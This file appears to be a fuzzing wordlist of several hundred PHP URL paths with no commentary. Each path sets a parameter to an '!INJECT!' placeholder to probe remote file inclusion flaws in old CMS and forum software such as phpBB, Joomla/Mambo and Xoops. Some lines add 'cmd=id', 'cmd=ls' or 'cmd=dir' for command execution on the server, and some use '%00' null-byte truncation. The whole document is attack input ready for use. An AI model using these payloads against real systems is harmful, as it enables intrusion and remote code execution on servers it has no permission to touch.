/index.php?cms=!INJECT!?
/index.php?config["sipssys"]=!INJECT!
/index.php?config[root_ordner]=!INJECT!?&cmd=id
/index.php?config[root_ordner]=!INJECT!?cmd=id
/index.php?config_atkroot=!INJECT!
/index.php?configuration=!INJECT!
/index.php?custom_admin_path=!INJECT!?
/index.php?dateiPfad=!INJECT!?&cmd=ls
/index.php?de=!INJECT!
/index.php?dept=!INJECT!
/index.php?do=!INJECT!
/index.php?exec=!INJECT!?
/index.php?ext=!INJECT!
/index.php?faq_path=!INJECT!?&cmd=id
/index.php?file_name[]=!INJECT!?
/index.php?file_path=!INJECT!?
/index.php?fileloc=!INJECT!
/index.php?from=!INJECT!
/index.php?func=!INJECT!?
/index.php?function=!INJECT!
/index.php?function=custom&custom=!INJECT!
/index.php?gOo=!INJECT!
/index.php?gen=!INJECT!
/index.php?get=!INJECT!
/index.php?home_name=!INJECT!
/index.php?ilang=!INJECT!?
/index.php?inc_dir=!INJECT!
/index.php?inc_dir=!INJECT!?
/index.php?includeDir=!INJECT!
/index.php?includeFooter=!INJECT!
/index.php?includesdir=!INJECT!
/index.php?insPath=!INJECT!
/index.php?lang=!INJECT!
/index.php?language=!INJECT!?
/index.php?language=en&main_page=!INJECT!
/index.php?lizge=!INJECT!?&cmd=ls
/index.php?lng=!INJECT!
/index.php?load=!INJECT!
/index.php?loadpage=!INJECT!
/index.php?main_tabid=1&main_content=!INJECT!
/index.php?may=!INJECT!
/index.php?middle=!INJECT!
/index.php?mode=!INJECT!
/index.php?modpath=!INJECT!
/index.php?module=PostWrap&page=!INJECT!
/index.php?mosConfig_absolute_path=!INJECT!
/index.php?news7["functions"]=!INJECT!
/index.php?news_include_path=!INJECT!
/index.php?open=!INJECT!
/index.php?option=com_custompages&cpage=!INJECT!?
/index.php?page=!INJECT!
/index.php?page=!INJECT!%00
/index.php?page=!INJECT!?
/index.php?page!INJECT!
/index.php?page[path]=!INJECT!?&cmd=ls
/index.php?pagename=!INJECT!
/index.php?pager=!INJECT!
/index.php?pagina=!INJECT!?
/index.php?path_to_folder=!INJECT!?cmd=id
/index.php?pg=!INJECT!?
/index.php?phpbb_root_path=!INJECT!
/index.php?plugin=!INJECT!
/index.php?principal=!INJECT!
/index.php?proMod=!INJECT!
/index.php?proMod=!INJECT!?cmd
/index.php?project=!INJECT!
/index.php?repinc=!INJECT!?
/index.php?root_prefix=!INJECT!
/index.php?root_prefix=!INJECT!?
/index.php?section=!INJECT!
/index.php?site=!INJECT!
/index.php?site_path=!INJECT!
/index.php?styl[top]=!INJECT!??
/index.php?template=!INJECT!?
/index.php?templates_dir=!INJECT!?
/index.php?theme=!INJECT!
/index.php?themepath=!INJECT!?
/index.php?themesdir=!INJECT!
/index.php?this_path=!INJECT!?
/index.php?txt=!INJECT!
/index.php?up=!INJECT!
/index.php?url=!INJECT!
/index.php?w=!INJECT!
/index.php?way=!INJECT!??????????????
/index1.php?=!INJECT!
/index1.php?inc=!INJECT!
/index1.php?inhalt=!INJECT!
/index2.php?=!INJECT!
/index2.php?content=!INJECT!
/index2.php?s=!INJECT!
/index2.php?x=!INJECT!
/indexinfo.php?bibtexrootrel=!INJECT!?
/indexk.php?lib_path=!INJECT!?
/info.php?file=!INJECT!
/inhalt.php?dateien[news]=!INJECT!?
/init.php?API_HOME_DIR=!INJECT!
/init.php?scriptpath=!INJECT!?
/initialize.php?hmail_config[includepath]=!INJECT!&cmd=dir
/initiate.php?abs_path=!INJECT!
/install.php?_NE[AbsPath]=!INJECT!
/install.php?install_dir=!INJECT!
/install/config.php?path=!INJECT!
/install/di.php?pathtoserverdata=!INJECT!
/install/index.php?content_php=!INJECT!
/install/install3.php?database=none&cabsolute_path=!INJECT!
/integration/shortstat/configuration.php?SPL_CFG[dirroot]=!INJECT!?
/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=!INJECT!?
/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=!INJECT!?
/interface/billing/billing_process.php?srcdir=!INJECT!?
/interface/editors/-custom.php?bField[bf_data]=!INJECT!
/interface/editors/custom.php?bField[bf_data]=!INJECT!
/interface/new/new_patient_save.php?srcdir=!INJECT!?
/intern/admin/?rootdir=!INJECT!
/intern/admin/other/backup.php?admin=1&rootdir=!INJECT!
/intern/clan/member_add.php?rootdir=!INJECT!
/intern/config/forum.php?rootdir=!INJECT!
/intern/config/key_2.php?rootdir=!INJECT!
/ip.inc.php?type=1&cgipath=!INJECT!
/ipeer_site/?page=!INJECT!?
/joinus.php?vwar_root=!INJECT!
/joinus.php?vwar_root=!INJECT!?&cmd=ls
/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=!INJECT!?
/joomla_path/components/com_articles.php?absolute_path=!INJECT!?
/js/bbcodepress/bbcode-form.php?BBCODE_path=!INJECT!
/js/wptable-tinymce.php?ABSPATH=!INJECT!
/jscript.php?my_ms[root]=!INJECT!?
/kernel/class/ixpts.class.php?IXP_ROOT_PATH=!INJECT!
/kernel/loadkernel.php?installPath=!INJECT!
/kmitaadmin/kmitam/htmlcode.php?file=!INJECT!?
/ktmlpro/includes/ktedit/toolbar.php?dirDepth=!INJECT!
/lang/leslangues.php?fichier=!INJECT!
/lang_english/lang_main_album.php?phpbb_root_path=!INJECT!?a=
/language/lang_english/lang_activity.php?phpbb_root_path=!INJECT!
/language/lang_english/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
/language/lang_german/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
/language/lang_german/lang_main_album.php?phpbb_root_path=!INJECT!?a=
/latestposts.php?forumspath=!INJECT!
/latex.php?bibtexrootrel=!INJECT!?
/layout/default/params.php?gConf[dir][layouts]=!INJECT!?
/ldap/authldap.php?includePath=!INJECT!
/learnPath/include/scormExport.inc.php?includePath=!INJECT!
/lib.editor.inc.php?sys_path=!INJECT!?
/lib/Loggix/Module/Calendar.php?pathToIndex=!INJECT!
/lib/Loggix/Module/Comment.php?pathToIndex=!INJECT!
/lib/Loggix/Module/Rss.php?pathToIndex=!INJECT!
/lib/Loggix/Module/Trackback.php?pathToIndex=!INJECT!
/lib/action/rss.php?lib=!INJECT!?
/lib/activeutil.php?set[include_path]=!INJECT!?
/lib/addressbook.php?GLOBALS[basedir]=!INJECT!
/lib/armygame.php?libpath=!INJECT!
/lib/authuser.php?root=!INJECT!
/lib/base.php?BaseCfg[BaseDir]=!INJECT!
/lib/connect.php?root=!INJECT!
/lib/connected_users.lib.php3?ChatPath=!INJECT!
/lib/connected_users.lib.php3?ChatPath=!INJECT!?
/lib/db/mysql.class.php?root=!INJECT!
/lib/db/postgres.class.php?root=!INJECT!
/lib/functions.php?DOC_ROOT=!INJECT!
/lib/googlesearch/GoogleSearch.php?APP[path][lib]=!INJECT!?
/lib/header.php?DOC_ROOT=!INJECT!
/lib/language.php?_LIB_DIR=!INJECT!
/lib/live_status.lib.php?ROOT=!INJECT!
/lib/misc.php?root=!INJECT!
/lib/nl/nl.php?g_strRootDir=!INJECT!
/lib/obj/collection.class.php?GLOBALS[application][app_root]=!INJECT!
/lib/obj/content_image.class.php?GLOBALS[application][app_root]=!INJECT!
/lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
/lib/pcltrace.lib.php?g_pcltar_lib_dir=!INJECT!
/lib/rs.php?rootpath=!INJECT!
/lib/selectlang.php?BBC_LANGUAGE_PATH=!INJECT!
/lib/smarty/SmartyFU.class.php?system[smarty][dir]=!INJECT!?
/lib/static/header.php?set_menu=!INJECT!
/lib/tpl.inc.php?conf[classpath]=!INJECT!
/libraries/comment/postComment.php?path[cb]=!INJECT!?a=
/libraries/database.php?path=!INJECT!???
/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=!INJECT!
/libraries/pcl/pcltar.php?g_pcltar_lib_dir=!INJECT!
/library/authorize.php?login_form=!INJECT!?
/library/translation.inc.php?GLOBALS[srcdir]=!INJECT!?
/libs/db.php?path_local=!INJECT!
/libs/ftp.php?path_local=!INJECT!
/libs/lom.php?ETCDIR=!INJECT!
/libsecure.php?abs_path=!INJECT!?
/license.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/link_main.php?phpbb_root_path=!INJECT!
/linkadmin.php?page=!INJECT!?
/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=!INJECT!?
/list.php?phpbb_root_path=!INJECT!
/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=!INJECT!
/lms_path/modules/welcome.php?_LIB_DIR=!INJECT!
/load_lang.php?_SERWEB[configdir]=!INJECT!
/load_lang.php?_SERWEB[serwebdir]=!INJECT!
/load_phplib.php?_PHPLIB[libdir]=!INJECT!
/loader.php?GLOBALS=!INJECT!
/local/lib/lcUser.php?LIBDIR=!INJECT!?
/log.php?bibtexrootrel=!INJECT!?
/login.php3?cl_headers=!INJECT!
/login.php?base_dir=!INJECT!
/login.php?blog_theme=!INJECT!
/login.php?langfile=!INJECT!
/login.php?pachtofile=!INJECT!
/login.php?srcdir=!INJECT!?
/login.php?value=!INJECT!??
/lovecms/install/index.php?step=!INJECT!?
/m2f/m2f_cron.php?m2f_root_path=!INJECT!
/m2f/m2f_forum.php?m2f_root_path=!INJECT!
/m2f/m2f_mailinglist.php?m2f_root_path=!INJECT!
/m2f/m2f_phpbb204.php?m2f_root_path=!INJECT!
/maguz.php?site=!INJECT!
/mail/childwindow.inc.php?form=!INJECT!?
/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=!INJECT!?
/mail_this_entry/mail_autocheck.php?pm_path=!INJECT!?&cmd=ls
/main.inc.php?pathtoscript=!INJECT!
/main.php?config[search_disp]=true&include_dir=!INJECT!
/main.php?id=!INJECT!
/main.php?include_path=!INJECT!?
/main.php?pageURL=!INJECT!
/main.php?pagina=!INJECT!
/main/forum/komentar.php?site_path=!INJECT!
/main/main.php?pi=!INJECT!
/main/ppcbannerclick.php?INC=!INJECT!?
/main/ppcclick.php?INC=!INJECT!?
/main_prepend.php?_SERWEB[functionsdir]=!INJECT!
/mainpage.php?docroot=!INJECT!?cmd
/mamboleto.php?mosConfig_absolute_path=!INJECT!
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=!INJECT!
/manage_songs.php?foing_root_path=!INJECT!
/manager/admin/index.php?MGR=!INJECT!
/manager/admin/p_ins.php?MGR=!INJECT!
/manager/admin/u_ins.php?MGR=!INJECT!
/manager/articles.php?_PX_config[manager_path]=!INJECT!
/manager/static/view.php?propID=0&INC=!INJECT!
/master.php?root_path=!INJECT!
/mcNews/admin/header.php?skinfile=!INJECT!
/mcf.php?content=!INJECT!
/mcnews/admin/install.php?l=!INJECT!
/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=!INJECT!
/member.php?vwar_root=!INJECT!
/member/usercp_menu.php?script_folder=!INJECT!
/members/index.php?INC=!INJECT!?
/members/registration.php?INC=!INJECT!?
/members_help.php?hlp=!INJECT!?
/membres/membreManager.php?include_path=!INJECT!?
/menu.php3?cl_headers=!INJECT!
/menu.php?functions_file=!INJECT!
/mep/frame.php?chem=!INJECT!?
/microcms/includes/file_manager/special.php?fm_includes_special=!INJECT!
/middle.php?file=!INJECT!
/migrateNE2toNE3.php?_NE[AbsPath]=!INJECT!
/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=!INJECT!?
/mini-pub.php/front-end/img.php?sFileName=!INJECT!?
/minimal/wiki.php?page=!INJECT!?
/misc/function.php3?path=!INJECT!?
/mitglieder.php?config[root_ordner]=!INJECT!?&cmd=id
/mkportal/include/user.php?MK_PATH=!INJECT!
/mkportal/include/user.php?MK_PATH=!INJECT!?
/mod/authent.php4?rootpath=!INJECT!
/mod/image/index.php?config[pathMod]=!INJECT!
/mod/liens/index.php?config[pathMod]=!INJECT!
/mod/liste/index.php?config[pathMod]=!INJECT!
/mod/special/index.php?config[pathMod]=!INJECT!
/mod/texte/index.php?config[pathMod]=!INJECT!
/mod_membre/inscription.php?chemin=!INJECT!?
/mod_phpalbum/sommaire_admin.php?chemin=!INJECT!?
/modernbill/include/html/config.php?DIR=!INJECT!
/modifyform.html?code=!INJECT!
/mods/business_functions.php?GALLERY_BASEDIR=!INJECT!
/mods/config/load.inc.php?moddir=!INJECT!?
/mods/http/load.inc.php?moddir=!INJECT!?
/mods/ui_functions.php?GALLERY_BASEDIR=!INJECT!
/module/forum/forum.php?fd=!INJECT!=';
/module/forum/main.php?id=1&main_dir=!INJECT!?&
/modules.php?name=!INJECT!&file=article&sid=2
/modules/4nAlbum/public/displayCategory.php?basepath=!INJECT!
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=!INJECT!
/modules/Calendar/admin/update.php?calpath=!INJECT!?
/modules/Calendar/calendar.php?calpath=!INJECT!?
/modules/Calendar/scheme.php?calpath=!INJECT!?
/modules/Discipline/CategoryBreakdownTime.php?FocusPath=!INJECT!
/modules/Discipline/CategoryBreakdownTime.php?staticpath=!INJECT!
/modules/Discipline/StudentFieldBreakdown.php?staticpath=!INJECT!
/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
/modules/My_eGallery/index.php?basepath=!INJECT!
/modules/My_eGallery/public/displayCategory.php?basepath=!INJECT!
/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=!INJECT!?
/modules/NukeAI/util.php?AIbasedir=!INJECT!
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=!INJECT!
/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
/modules/abook/foldertree.php?baseDir==!INJECT!?
/modules/addons/plugin.php?doc_root=!INJECT!
/modules/admin/include/config.php?doc_root=!INJECT!
/modules/admin/include/localize.php?doc_root=!INJECT!
/modules/agendax/addevent.inc.php?agendax_path=!INJECT!&cmd=id
/modules/bank/includes/design/main.inc.php?bank_data[root]=!INJECT!?
/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=!INJECT!
/modules/birstday/birst.php?exbb[home_path]=!INJECT!?
/modules/birstday/profile_show.php?exbb[home_path]=!INJECT!?
/modules/birstday/select.php?exbb[home_path]=!INJECT!?
/modules/blocks/headerfile.php?system[path]=!INJECT!
/modules/calendar/index.php?inc_dir=!INJECT!
/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=!INJECT!?
/modules/calendar/mod_calendar.php?absolute_path=!INJECT!?
/modules/certinfo/index.php?full_path=!INJECT!
/modules/character_roster/include.php?mod_root=!INJECT!?
/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=!INJECT!?
/modules/coppermine/themes/default/theme.php?THEME_DIR=!INJECT!
/modules/downloads/lib/LM_Downloads.php?pathToIndex=!INJECT!
/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
/modules/emails/index.php?full_path=!INJECT!
/modules/events/index.php?full_path=!INJECT!
/modules/fax/index.php?full_path=!INJECT!
/modules/files/blocks/latest_files.php?system[path]=!INJECT!
/modules/files/index.php?full_path=!INJECT!
/modules/files/list.php?full_path=!INJECT!
/modules/filters/headerfile.php?system[path]=!INJECT!
/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=!INJECT!?
/modules/forums/blocks/latest_posts.php?system[path]=!INJECT!
/modules/global/inc/content.inc.php?sIncPath=!INJECT!?
/modules/groupadm/index.php?full_path=!INJECT!
/modules/groups/headerfile.php?system[path]=!INJECT!
/modules/guestbook/index.php?CONFIG[local_root]=!INJECT!?
/modules/history/index.php?full_path=!INJECT!
/modules/home.module.php?repmod=!INJECT!?
/modules/horoscope/footer.php?xoopsConfig[root_path]=!INJECT!
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=!INJECT!
/modules/info/index.php?full_path=!INJECT!
/modules/links/blocks/links.php?system[path]=!INJECT!
/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
/modules/links/submit_links.php?rootdp=zZz&gsLanguage=!INJECT!
/modules/log/index.php?full_path=!INJECT!
/modules/mail/index.php?full_path=!INJECT!
/modules/menu/headerfile.php?system[path]=!INJECT!
/modules/messages/index.php?full_path=!INJECT!
/modules/mod_as_category.php?mosConfig_absolute_path=!INJECT!
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=!INJECT!
/modules/mod_calendar.php?absolute_path=!INJECT!
/modules/mod_flatmenu.php?mosConfig_absolute_path=!INJECT!
/modules/mod_mainmenu.php?mosConfig_absolute_path=!INJECT!
/modules/mod_weather.php?absolute_path=!INJECT!?
/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=!INJECT!?
/modules/newbb_plus/config.php?bbPath[root_theme]=!INJECT!
/modules/newbb_plus/votepolls.php?bbPath[path]=!INJECT!
/modules/news/blocks/latest_news.php?system[path]=!INJECT!
/modules/newusergreatings/pm_newreg.php?exbb[home_path]=!INJECT!?
/modules/organizations/index.php?full_path=!INJECT!
/modules/phones/index.php?full_path=!INJECT!
/modules/pms/index.php?module_path=!INJECT!???
/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=!INJECT!?
/modules/presence/index.php?full_path=!INJECT!
/modules/projects/index.php?full_path=!INJECT!
/modules/projects/list.php?full_path=!INJECT!
/modules/projects/summary.inc.php?full_path=!INJECT!
/modules/punish/p_error.php?exbb[home_path]=!INJECT!?
/modules/punish/profile.php?exbb[home_path]=!INJECT!?
/modules/reports/index.php?full_path=!INJECT!
/modules/search/index.php?full_path=!INJECT!
/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!?
/modules/settings/headerfile.php?system[path]=!INJECT!
/modules/snf/index.php?full_path=!INJECT!
/modules/syslog/index.php?full_path=!INJECT!
/modules/tasks/index.php?full_path=!INJECT!
/modules/tasks/searchsimilar.php?full_path=!INJECT!
/modules/tasks/summary.inc.php?full_path=!INJECT!
/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
/modules/tml/block.tag.php?GLOBALS[PTH][classes]=!INJECT!
/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=!INJECT!
/modules/useradm/index.php?full_path=!INJECT!
/modules/users/headerfile.php?system[path]=!INJECT!
/modules/vWar_Account/includes/functions_common.php?vwar_root2=!INJECT!
/modules/visitors2/include/config.inc.php?lvc_include_dir=!INJECT!?
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=!INJECT!
/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=!INJECT!
/modules/xfsection/modify.php?dir_module=!INJECT!
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=!INJECT!
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!?
/modulistica/mdl_save.php?CLASSPATH=!INJECT!
/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
/moodle/admin/utfdbmigrate.php?cmd=!INJECT!
/moosegallery/display.php?type=!INJECT!?&cmd=[command]
/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=!INJECT!
/moteur/moteur.php?chemin=!INJECT!?
/movie_cls.php?full_path=!INJECT!
/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
/music/buycd.php?HTTP_DOCUMENT_ROOT=!INJECT!?
/mutant_includes/mutant_functions.php?phpbb_root_path=!INJECT!
/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=!INJECT!
/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=!INJECT!
/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
/myphpcommander_path/system/lib/package.php?gl_root=!INJECT!?cmd
/mysave.php?file=!INJECT!
/naboard_pnr.php?skin=!INJECT!?
/ncaster/admin/addons/archive/archive.php?adminfolder=!INJECT!
/network_module_selector.php?path_prefix=!INJECT!
/news.php?CONFIG[script_path]=!INJECT!?
/news.php?config[root_ordner]=!INJECT!?&cmd=id
/news.php?scriptpath=!INJECT!?
/news.php?vwar_root=!INJECT!
/news/include/createdb.php?langfile;=!INJECT!?
/news/include/customize.php?l=!INJECT!?
/news/newstopic_inc.php?indir=!INJECT!
/news/scripts/news_page.php?script_path=!INJECT!?
/newsadmin.php?action=!INJECT!
/newsarchive.php?path_to_script=!INJECT!?&cmd=ls
/newsfeeds/includes/aggregator.php?zf_path=!INJECT!
/newsfeeds/includes/controller.php?zf_path=!INJECT!
/newsletter/newsletter.php?waroot=!INJECT!
/newsp/lib/class.Database.php?path=!INJECT!?
/newticket.php?lang=!INJECT!
/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=!INJECT!
/noticias.php?inc=!INJECT!?
/nucleus/plugins/skinfiles/index.php?DIR_LIBS=!INJECT!
/nuke_path/iframe.php?file=!INJECT!
/nukebrowser.php?filnavn=!INJECT!&filhead=!INJECT!&cmd=id
/nuseo/admin/nuseo_admin_d.php?nuseo_dir=!INJECT!?
/oaboard_en/forum.php?inc=!INJECT!
/ocp-103/index.php?req_path=!INJECT!
/ocs/include/footer.inc.php?fullpath=!INJECT!?
/ocs/include/theme.inc.php?fullpath=!INJECT!?
/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=!INJECT!?
/olbookmarks-0.7.4/themes/test1.php?!INJECT!
/oneadmin/adminfoot.php?path[docroot]=!INJECT!
/oneadmin/blogger/sampleblogger.php?path[docroot]=!INJECT!?
/oneadmin/config-bak.php?include_once=!INJECT!
/oneadmin/config.php?path[docroot]=!INJECT!
/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=!INJECT!?
/online.php?config[root_ordner]=!INJECT!?&cmd=id
/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=!INJECT!?
/openi-admin/base/fileloader.php?config[openi_dir]=!INJECT!
/openrat/themes/default/include/html/insert.inc.php?tpl_dir=!INJECT!???
/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=!INJECT!
/ops/gals.php?news_file=!INJECT!
/order/login.php?svr_rootscript=!INJECT!
/osData/php121/php121db.php?php121dir=!INJECT!%00
/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=!INJECT!?
/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=!INJECT!?
/owimg.php3?path=!INJECT!
/p-news.php?pn_lang=!INJECT!
/pafiledb/includes/pafiledb_constants.php?module_root_path=!INJECT!
/page.php?goto=!INJECT!
/page.php?id=!INJECT!
/panel/common/theme/default/header_setup.php?path[docroot]=!INJECT!
/param_editor.php?folder=!INJECT!?
/parse/parser.php?WN_BASEDIR=!INJECT!
/patch/?language_id=!INJECT!
/patch/tools/send_reminders.php?noSet=0&includedir=!INJECT!?
/paypalipn/ipnprocess.php?INC=!INJECT!?
/pda/pda_projects.php?offset=!INJECT!
/phfito/phfito-post?SRC_PATH=!INJECT!
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=!INJECT!
/photo_comment.php?toroot=!INJECT!
/php-inc/log.inc.php?SKIN_URL=!INJECT!
/php-include-robotsservices.php?page=!INJECT!
/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
/php.incs/common.inc.php?cm_basedir=!INJECT!?
/php/init.gallery.php?include_class=!INJECT!/something
/php121db.php?php121dir=!INJECT!%00
/php4you.php?dir=!INJECT!?
/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=!INJECT!?
/phpBB2/shoutbox.php?phpbb_root_path=!INJECT!
/phpCards.header.php?CardPath=!INJECT!?
/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
/phpMyChat.php3?=!INJECT!?cmd=id
/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=!INJECT!?
/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=!INJECT!?
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
/phpbb/sendmsg.php?phpbb_root_path=!INJECT!
/phpcalendar/includes/calendar.php?phpc_root_path=!INJECT!?
/phpcalendar/includes/setup.php?phpc_root_path=!INJECT!?
/phpdebug_PATH/test/debug_test.php?debugClassLocation=!INJECT!
/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=!INJECT!
/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=!INJECT!
/phphd_downloads/common.php?phphd_real_path=!INJECT!
/phphost_directoryv2/include/admin.php?rd=!INJECT!?
/phphtml.php?htmlclass_path=!INJECT!
/phpi/edit_top_feature.php?include_connection=!INJECT!
/phpi/edit_topics_feature.php?include_connection=!INJECT!
/phplib/site_conf.php?ordnertiefe=!INJECT!
/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/referenz.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=!INJECT!
/phplinks/includes/smarty.php?full_path_to_public_program=!INJECT!
/phporacleview/inc/include_all.inc.php?page_dir=!INJECT!?
/phppc/poll.php?is_phppc_included=1&relativer_pfad=!INJECT!?
/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=!INJECT!?
/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=!INJECT!?
/phpquickgallery/gallery_top.inc.php?textFile=!INJECT!
/phpreactor/inc/polls.inc.php?pathtohomedir=!INJECT!?
/phpreactor/inc/updatecms.inc.php?pathtohomedir=!INJECT!?
/phpreactor/inc/users.inc.php?pathtohomedir=!INJECT!?
/phpreactor/inc/view.inc.php?pathtohomedir=!INJECT!?
/phpress/adisplay.php?lang=!INJECT!
/phpunity-postcard.php?plgallery_epost=1&gallery_path=!INJECT!?
/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=!INJECT!
/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=!INJECT!
/phpyabs/moduli/libri/index.php?Azione=!INJECT!
/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=!INJECT!
/playlist.php?phpbb_root_path=!INJECT!
/plugin/HP_DEV/cms2.php?s_dir=!INJECT!?
/plugin/gateway/gnokii/init.php?apps_path[plug]=!INJECT!?
/plugins/1_Adressbuch/delete.php?folder=!INJECT!
/plugins/BackUp/Archive.php?bkpwp_plugin_path=!INJECT!?
/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=!INJECT!?
/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=!INJECT!?
/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=!INJECT!?
/plugins/links/functions.inc?_CONF[path]=!INJECT!
/plugins/polls/functions.inc?_CONF[path]=!INJECT!
/plugins/rss_importer_functions.php?sitepath=!INJECT!?
/plugins/safehtml/HTMLSax3.php?dir[plugins]=!INJECT!?
/plugins/safehtml/safehtml.php?dir[plugins]=!INJECT!?
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=!INJECT!
/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=!INJECT!
/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=!INJECT!
/plugins/spamx/Import.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=!INJECT!
/plugins/staticpages/functions.inc?_CONF[path]=!INJECT!
/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=!INJECT!
/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=!INJECT!
/plus.php?_pages_dir=!INJECT!?
